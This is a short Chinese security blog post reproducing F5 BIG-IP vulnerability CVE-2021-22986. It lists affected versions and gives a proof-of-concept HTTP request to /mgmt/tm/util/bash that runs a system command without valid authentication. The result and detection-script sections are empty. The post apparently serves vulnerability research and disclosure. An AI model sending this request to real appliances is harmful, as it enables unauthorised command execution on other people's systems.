F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)

gclome

原文链接：F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)


一、简介


该漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问，以执行任意系统命令，创建或删除文件以及禁用服务。

二、影响版本

F5 BIG-IP 16.x: 16.1.0.3
F5 BIG-IP 15.x: 15.1.0.4
F5 BIG-IP 14.x: 14.1.2.6
F5 BIG-IP 13.x: 13.1.3.4
F5 BIG-IP 12.x: 12.1.5.2
F5 BIG-IP 11.x: 11.6.5.2

三、漏洞复现
​
POC：

1. POST /mgmt/tm/util/bash HTTP/1.1
   
2. Host: 127.0.0.1
   
3. Connection: close
   
4. Content-Length: 41
   
5. Cache-Control: max-age=0
   
6. Authorization: Basic YWRtaW46QVNhc1M=
   
7. X-F5-Auth-Token:
   
8. Upgrade-Insecure-Requests: 1
   
9. Content-Type: application/json
   
10. 
    
11. {"command":"run","utilCmdArgs":"-c id"}

复制代码

执行效果：

​
编写检测脚本：
​

参考：
https://mp.weixin.qq.com/s/ZtE7R4PPgdWY9ea06A9wqQ
https://mp.weixin.qq.com/s/ZpbJwQ3tTNvSKCIRrPl3hg

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!
转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

订阅查看更多复现文章、学习笔记
thelostworld
安全路上，与你并肩前行！！！！